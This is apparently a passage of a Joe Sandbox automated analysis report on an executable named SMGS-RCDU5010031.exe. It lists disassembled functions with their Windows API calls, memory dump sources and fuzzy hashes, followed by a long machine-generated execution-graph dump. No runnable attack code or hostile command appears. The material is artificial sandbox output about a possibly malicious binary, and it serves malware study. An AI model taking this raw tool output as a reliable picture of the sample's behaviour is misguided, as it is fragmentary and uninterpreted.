• lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
• GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-3355392842
• Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
• Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
• Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
• Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
• CloseHandle.KERNEL32(?), ref: 00405766
Strings
• Error launching installer, xrefs: 00405743
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
• Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
• Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
• Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,75BA3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
• GlobalFree.KERNEL32(?), ref: 00403825
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
• Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
• Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
• Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405A56
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405A66
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3370423016
• Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
• Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
• Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
• Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                          • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                          Signature Coverage:1.6%
                                                                                                                                                                                                          Total number of Nodes:1661
                                                                                                                                                                                                          Total number of Limit Nodes:5
6178->6201 6180 37566368 20 API calls 6179->6180 6181 375676f8 6180->6181 6183 375662ac 26 API calls 6181->6183 6187 3756771f 6182->6187 6219 37565671 RtlEnterCriticalSection 6182->6219 6183->6201 6189 3756777e 6187->6189 6190 37567776 6187->6190 6198 375677a9 6187->6198 6220 375656b9 RtlLeaveCriticalSection 6187->6220 6189->6198 6221 37567665 6189->6221 6193 37564bc1 28 API calls 6190->6193 6193->6189 6195 37565af6 38 API calls 6199 3756780c 6195->6199 6197 37567665 38 API calls 6197->6198 6224 3756782e 6198->6224 6200 37565af6 38 API calls 6199->6200 6199->6201 6200->6201 6228 3756bdc9 6201->6228 6232 3756499b 6202->6232 6208 37567527 6205->6208 6207 375655ad 6207->6168 6207->6175 6209 37567533 6208->6209 6214 37565671 RtlEnterCriticalSection 6209->6214 6211 37567541 6215 37567575 6211->6215 6213 37567568 6213->6207 6214->6211 6218 375656b9 RtlLeaveCriticalSection 6215->6218 6217 3756757f 6217->6213 6218->6217 6219->6187 6220->6190 6222 37565af6 38 API calls 6221->6222 6223 3756766a 6222->6223 6223->6197 6225 37567834 6224->6225 6227 375677fd 6224->6227 6231 375656b9 RtlLeaveCriticalSection 6225->6231 6227->6195 6227->6199 6227->6201 6229 37562ada 5 API calls 6228->6229 6230 3756bdd4 6229->6230 6230->6230 6231->6227 6234 375649a7 6232->6234 6233 375649bf 6263 37565671 RtlEnterCriticalSection 6233->6263 6234->6233 6254 37564af5 GetModuleHandleW 6234->6254 6238 37564a65 6271 37564aa5 6238->6271 6242 37564a3c 6245 37564a54 6242->6245 6267 37564669 6242->6267 6243 37564a82 6274 37564ab4 6243->6274 6244 37564aae 6249 3756bdc9 5 API calls 6244->6249 6251 37564669 5 API calls 6245->6251 6246 375649c7 6246->6238 6246->6242 6264 3756527a 6246->6264 6253 37564ab3 6249->6253 6251->6238 6255 375649b3 6254->6255 6255->6233 6256 37564b39 GetModuleHandleExW 6255->6256 6257 37564b63 GetProcAddress 6256->6257 6258 37564b78 6256->6258 6257->6258 6259 37564b95 6258->6259 6260 37564b8c FreeLibrary 6258->6260 6261 37562ada 5 API calls 6259->6261 6260->6259 6262 37564b9f 6261->6262 
6262->6233 6263->6246 6282 37565132 6264->6282 6270 37564698 6267->6270 6268 37562ada 5 API calls 6269 375646c1 6268->6269 6269->6245 6270->6268 6303 375656b9 RtlLeaveCriticalSection 6271->6303 6273 37564a7e 6273->6243 6273->6244 6304 37566025 6274->6304 6277 37564ae2 6280 37564b39 8 API calls 6277->6280 6278 37564ac2 GetPEB 6278->6277 6279 37564ad2 GetCurrentProcess TerminateProcess 6278->6279 6279->6277 6281 37564aea ExitProcess 6280->6281 6285 375650e1 6282->6285 6284 37565156 6284->6242 6286 375650ed 6285->6286 6293 37565671 RtlEnterCriticalSection 6286->6293 6288 375650fb 6294 3756515a 6288->6294 6292 37565119 6292->6284 6293->6288 6297 37565182 6294->6297 6298 3756517a 6294->6298 6295 37562ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6296 37565108 6295->6296 6300 37565126 6296->6300 6297->6298 6299 3756571e 20 API calls 6297->6299 6298->6295 6299->6298 6301 375656b9 RtlLeaveCriticalSection 6300->6301 6302 37565130 6301->6302 6302->6292 6303->6273 6305 3756604a 6304->6305 6309 37566040 6304->6309 6306 37565c45 5 API calls 6305->6306 6306->6309 6307 37562ada 5 API calls 6308 37564abe 6307->6308 6308->6277 6308->6278 6309->6307 6311 37567f1b 6310->6311 6312 37565af6 38 API calls 6311->6312 6313 37567f24 6312->6313 6314 37567f72 6313->6314 6322 37565671 RtlEnterCriticalSection 6313->6322 6314->6155 6316 37567f42 6323 37567f86 6316->6323 6321 375655a8 38 API calls 6321->6314 6322->6316 6324 37567f94 6323->6324 6326 37567f56 6323->6326 6324->6326 6330 37567cc2 6324->6330 6327 37567f75 6326->6327 6444 375656b9 RtlLeaveCriticalSection 6327->6444 6329 37567f69 6329->6314 6329->6321 6331 37567cd8 6330->6331 6333 37567d42 6330->6333 6331->6333 6335 37567d0b 6331->6335 6340 3756571e 20 API calls 6331->6340 6334 3756571e 20 API calls 6333->6334 6357 37567d90 6333->6357 6336 37567d64 6334->6336 6337 37567d2d 6335->6337 6345 3756571e 20 API calls 6335->6345 6338 3756571e 20 API calls 6336->6338 6339 
3756571e 20 API calls 6337->6339 6341 37567d77 6338->6341 6342 37567d37 6339->6342 6344 37567d00 6340->6344 6346 3756571e 20 API calls 6341->6346 6347 3756571e 20 API calls 6342->6347 6343 37567dfe 6348 3756571e 20 API calls 6343->6348 6358 375690ba 6344->6358 6350 37567d22 6345->6350 6351 37567d85 6346->6351 6347->6333 6354 37567e04 6348->6354 6386 375691b8 6350->6386 6356 3756571e 20 API calls 6351->6356 6352 37567d9e 6352->6343 6353 3756571e 20 API calls 6352->6353 6353->6352 6354->6326 6356->6357 6398 37567e35 6357->6398 6359 375690cb 6358->6359 6385 375691b4 6358->6385 6360 375690dc 6359->6360 6361 3756571e 20 API calls 6359->6361 6362 375690ee 6360->6362 6364 3756571e 20 API calls 6360->6364 6361->6360 6363 37569100 6362->6363 6365 3756571e 20 API calls 6362->6365 6366 37569112 6363->6366 6367 3756571e 20 API calls 6363->6367 6364->6362 6365->6363 6368 37569124 6366->6368 6369 3756571e 20 API calls 6366->6369 6367->6366 6370 37569136 6368->6370 6372 3756571e 20 API calls 6368->6372 6369->6368 6371 37569148 6370->6371 6373 3756571e 20 API calls 6370->6373 6374 3756915a 6371->6374 6375 3756571e 20 API calls 6371->6375 6372->6370 6373->6371 6376 3756571e 20 API calls 6374->6376 6378 3756916c 6374->6378 6375->6374 6376->6378 6377 3756917e 6379 37569190 6377->6379 6381 3756571e 20 API calls 6377->6381 6378->6377 6380 3756571e 20 API calls 6378->6380 6382 375691a2 6379->6382 6383 3756571e 20 API calls 6379->6383 6380->6377 6381->6379 6384 3756571e 20 API calls 6382->6384 6382->6385 6383->6382 6384->6385 6385->6335 6387 375691c5 6386->6387 6388 3756921d 6386->6388 6389 375691d5 6387->6389 6390 3756571e 20 API calls 6387->6390 6388->6337 6391 375691e7 6389->6391 6392 3756571e 20 API calls 6389->6392 6390->6389 6393 375691f9 6391->6393 6395 3756571e 20 API calls 6391->6395 6392->6391 6394 3756920b 6393->6394 6396 3756571e 20 API calls 6393->6396 6394->6388 6397 3756571e 20 API calls 6394->6397 6395->6393 6396->6394 6397->6388 6399 37567e42 6398->6399 6403 37567e60 
6398->6403 6399->6403 6404 3756925d 6399->6404 6402 3756571e 20 API calls 6402->6403 6403->6352 6405 37567e5a 6404->6405 6406 3756926e 6404->6406 6405->6402 6440 37569221 6406->6440 6409 37569221 20 API calls 6410 37569281 6409->6410 6411 37569221 20 API calls 6410->6411 6412 3756928c 6411->6412 6413 37569221 20 API calls 6412->6413 6414 37569297 6413->6414 6415 37569221 20 API calls 6414->6415 6416 375692a5 6415->6416 6417 3756571e 20 API calls 6416->6417 6418 375692b0 6417->6418 6419 3756571e 20 API calls 6418->6419 6420 375692bb 6419->6420 6421 3756571e 20 API calls 6420->6421 6422 375692c6 6421->6422 6423 37569221 20 API calls 6422->6423 6424 375692d4 6423->6424 6425 37569221 20 API calls 6424->6425 6426 375692e2 6425->6426 6427 37569221 20 API calls 6426->6427 6428 375692f3 6427->6428 6429 37569221 20 API calls 6428->6429 6430 37569301 6429->6430 6431 37569221 20 API calls 6430->6431 6432 3756930f 6431->6432 6433 3756571e 20 API calls 6432->6433 6434 3756931a 6433->6434 6435 3756571e 20 API calls 6434->6435 6436 37569325 6435->6436 6437 3756571e 20 API calls 6436->6437 6438 37569330 6437->6438 6439 3756571e 20 API calls 6438->6439 6439->6405 6441 37569258 6440->6441 6442 37569248 6440->6442 6441->6409 6442->6441 6443 3756571e 20 API calls 6442->6443 6443->6442 6444->6329 6446 37566d8a 6445->6446 6447 37565af6 38 API calls 6446->6447 6449 37566d94 6447->6449 6451 37566e18 6449->6451 6452 375655a8 38 API calls 6449->6452 6453 3756571e 20 API calls 6449->6453 6454 37565671 RtlEnterCriticalSection 6449->6454 6455 37566e0f 6449->6455 6451->6158 6452->6449 6453->6449 6454->6449 6458 375656b9 RtlLeaveCriticalSection 6455->6458 6457 37566e16 6457->6449 6458->6457 7674 37567a80 7675 37567a8d 7674->7675 7676 3756637b 20 API calls 7675->7676 7677 37567aa7 7676->7677 7678 3756571e 20 API calls 7677->7678 7679 37567ab3 7678->7679 7680 3756637b 20 API calls 7679->7680 7684 37567ad9 7679->7684 7681 37567acd 7680->7681 7683 3756571e 20 API calls 7681->7683 7682 37565eb7 11 
API calls 7682->7684 7683->7684 7684->7682 7685 37567ae5 7684->7685 6459 3756724e GetProcessHeap 6460 3756284f 6463 37562882 6460->6463 6466 37563550 6463->6466 6465 3756285d 6467 3756358a 6466->6467 6468 3756355d 6466->6468 6467->6465 6468->6467 6469 375647e5 21 API calls 6468->6469 6470 3756357a 6469->6470 6470->6467 6472 3756544d 6470->6472 6473 3756545a 6472->6473 6474 37565468 6472->6474 6473->6474 6478 3756547f 6473->6478 6475 37566368 20 API calls 6474->6475 6480 37565470 6475->6480 6476 375662ac 26 API calls 6477 3756547a 6476->6477 6477->6467 6478->6477 6479 37566368 20 API calls 6478->6479 6479->6480 6480->6476 6939 3756220c 6940 37562215 6939->6940 6941 3756221a 6939->6941 6945 375622b1 6940->6945 6949 375620db 6941->6949 6944 37562228 6946 375622c7 6945->6946 6948 375622d0 6946->6948 6957 37562264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6946->6957 6948->6941 6950 375620e7 6949->6950 6953 3756210b 6950->6953 6956 375620f6 6950->6956 6958 37561eec 6950->6958 6952 3756216d 6954 37561eec 50 API calls 6952->6954 6952->6956 6953->6952 6955 37561eec 50 API calls 6953->6955 6953->6956 6954->6956 6955->6952 6956->6944 6957->6948 6959 37561ef7 6958->6959 6960 37561f2a 6958->6960 6962 37561f1c 6959->6962 6963 37561efc 6959->6963 7001 37562049 6960->7001 6983 37561f3f 6962->6983 6964 37561f12 6963->6964 6965 37561f01 6963->6965 6975 375623ec 6964->6975 6969 37561f06 6965->6969 6970 3756240b 6965->6970 6969->6953 7015 375653e5 6970->7015 7111 37563513 6975->7111 6980 37562408 6980->6969 6981 3756351e 7 API calls 6982 375623f5 6981->6982 6982->6969 6984 37561f4b 6983->6984 7129 3756247c 6984->7129 6986 37561f52 6987 37562041 6986->6987 6988 37561f7c 6986->6988 6994 37561f57 6986->6994 7152 37562639 IsProcessorFeaturePresent 6987->7152 7140 375623de 6988->7140 6991 37562048 6992 37561f8b 6992->6994 7143 375622fc RtlInitializeSListHead 6992->7143 6994->6969 6995 37561f99 7144 375646c5 6995->7144 6999 37561fb8 6999->6994 
7000 37564669 5 API calls 6999->7000 7000->6994 7002 37562055 7001->7002 7003 375620d3 7002->7003 7004 3756207d 7002->7004 7014 3756205e 7002->7014 7005 37562639 4 API calls 7003->7005 7204 3756244c 7004->7204 7007 375620da 7005->7007 7008 37562082 7213 37562308 7008->7213 7010 37562087 7216 375620c4 7010->7216 7012 3756209f 7219 3756260b 7012->7219 7014->6969 7021 37565aca 7015->7021 7018 3756351e 7095 37563820 7018->7095 7020 37562415 7020->6969 7022 37565ad4 7021->7022 7023 37562410 7021->7023 7024 37565e08 11 API calls 7022->7024 7023->7018 7025 37565adb 7024->7025 7025->7023 7026 37565e5e 11 API calls 7025->7026 7027 37565aee 7026->7027 7029 375659b5 7027->7029 7030 375659d0 7029->7030 7031 375659c0 7029->7031 7030->7023 7035 375659d6 7031->7035 7034 3756571e 20 API calls 7034->7030 7036 375659ef 7035->7036 7037 375659e9 7035->7037 7039 3756571e 20 API calls 7036->7039 7038 3756571e 20 API calls 7037->7038 7038->7036 7040 375659fb 7039->7040 7041 3756571e 20 API calls 7040->7041 7042 37565a06 7041->7042 7043 3756571e 20 API calls 7042->7043 7044 37565a11 7043->7044 7045 3756571e 20 API calls 7044->7045 7046 37565a1c 7045->7046 7047 3756571e 20 API calls 7046->7047 7048 37565a27 7047->7048 7049 3756571e 20 API calls 7048->7049 7050 37565a32 7049->7050 7051 3756571e 20 API calls 7050->7051 7052 37565a3d 7051->7052 7053 3756571e 20 API calls 7052->7053 7054 37565a48 7053->7054 7055 3756571e 20 API calls 7054->7055 7056 37565a56 7055->7056 7061 3756589c 7056->7061 7067 375657a8 7061->7067 7063 375658c0 7064 375658ec 7063->7064 7079 37565809 7064->7079 7066 37565910 7066->7034 7068 375657b4 7067->7068 7075 37565671 RtlEnterCriticalSection 7068->7075 7071 375657be 7072 3756571e 20 API calls 7071->7072 7074 375657e8 7071->7074 7072->7074 7073 375657f5 7073->7063 7076 375657fd 7074->7076 7075->7071 7077 375656b9 RtlLeaveCriticalSection 7076->7077 7078 37565807 7077->7078 7078->7073 7080 37565815 7079->7080 7087 37565671 RtlEnterCriticalSection 7080->7087 7082 3756581f 
7088 37565a7f 7082->7088 7084 37565832 7092 37565848 7084->7092 7086 37565840 7086->7066 7087->7082 7089 37565a8e 7088->7089 7091 37565ab5 7088->7091 7090 37567cc2 20 API calls 7089->7090 7089->7091 7090->7091 7091->7084 7093 375656b9 RtlLeaveCriticalSection 7092->7093 7094 37565852 7093->7094 7094->7086 7096 3756382d 7095->7096 7100 3756384b 7095->7100 7097 3756383b 7096->7097 7101 37563b67 7096->7101 7106 37563ba2 7097->7106 7100->7020 7102 37563a82 5 API calls 7101->7102 7103 37563b81 7102->7103 7104 37563b99 TlsGetValue 7103->7104 7105 37563b8d 7103->7105 7104->7105 7105->7097 7107 37563a82 5 API calls 7106->7107 7108 37563bbc 7107->7108 7109 37563bd7 TlsSetValue 7108->7109 7110 37563bcb 7108->7110 7109->7110 7110->7100 7117 37563856 7111->7117 7113 375623f1 7113->6982 7114 375653da 7113->7114 7115 37565b7a 20 API calls 7114->7115 7116 375623fd 7115->7116 7116->6980 7116->6981 7118 37563862 GetLastError 7117->7118 7119 3756385f 7117->7119 7120 37563b67 6 API calls 7118->7120 7119->7113 7121 37563877 7120->7121 7122 375638dc SetLastError 7121->7122 7123 37563ba2 6 API calls 7121->7123 7128 37563896 7121->7128 7122->7113 7124 37563890 7123->7124 7125 375638b8 7124->7125 7126 37563ba2 6 API calls 7124->7126 7124->7128 7127 37563ba2 6 API calls 7125->7127 7125->7128 7126->7125 7127->7128 7128->7122 7130 37562485 7129->7130 7156 37562933 IsProcessorFeaturePresent 7130->7156 7134 37562496 7135 3756249a 7134->7135 7167 375653c8 7134->7167 7135->6986 7138 375624b1 7138->6986 7139 37563529 8 API calls 7139->7135 7198 375624b5 7140->7198 7142 375623e5 7142->6992 7143->6995 7145 375646dc 7144->7145 7146 37562ada 5 API calls 7145->7146 7147 37561fad 7146->7147 7147->6994 7148 375623b3 7147->7148 7149 375623b8 7148->7149 7150 37562933 IsProcessorFeaturePresent 7149->7150 7151 375623c1 7149->7151 7150->7151 7151->6999 7153 3756264e 7152->7153 7154 375626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7153->7154 7155 37562744 7154->7155 7155->6991 
7157 37562491 7156->7157 7158 375634ea 7157->7158 7159 375634ef 7158->7159 7170 37563936 7159->7170 7162 375634fd 7162->7134 7164 37563505 7165 37563510 7164->7165 7166 37563972 RtlDeleteCriticalSection 7164->7166 7165->7134 7166->7162 7194 37567457 7167->7194 7171 3756393f 7170->7171 7173 37563968 7171->7173 7174 375634f9 7171->7174 7184 37563be0 7171->7184 7175 37563972 RtlDeleteCriticalSection 7173->7175 7174->7162 7176 375638e8 7174->7176 7175->7174 7189 37563af1 7176->7189 7179 375638fd 7179->7164 7180 37563ba2 6 API calls 7181 3756390b 7180->7181 7182 37563918 7181->7182 7183 3756391b 6 API calls 7181->7183 7182->7164 7183->7179 7185 37563a82 5 API calls 7184->7185 7186 37563bfa 7185->7186 7187 37563c18 InitializeCriticalSectionAndSpinCount 7186->7187 7188 37563c03 7186->7188 7187->7188 7188->7171 7190 37563a82 5 API calls 7189->7190 7191 37563b0b 7190->7191 7192 37563b24 TlsAlloc 7191->7192 7193 375638f2 7191->7193 7193->7179 7193->7180 7197 37567470 7194->7197 7195 37562ada 5 API calls 7196 375624a3 7195->7196 7196->7138 7196->7139 7197->7195 7199 375624c4 7198->7199 7200 375624c8 7198->7200 7199->7142 7201 37562639 4 API calls 7200->7201 7203 375624d5 7200->7203 7202 37562559 7201->7202 7203->7142 7205 37562451 7204->7205 7206 37562455 7205->7206 7209 37562461 7205->7209 7207 3756527a 20 API calls 7206->7207 7208 3756245f 7207->7208 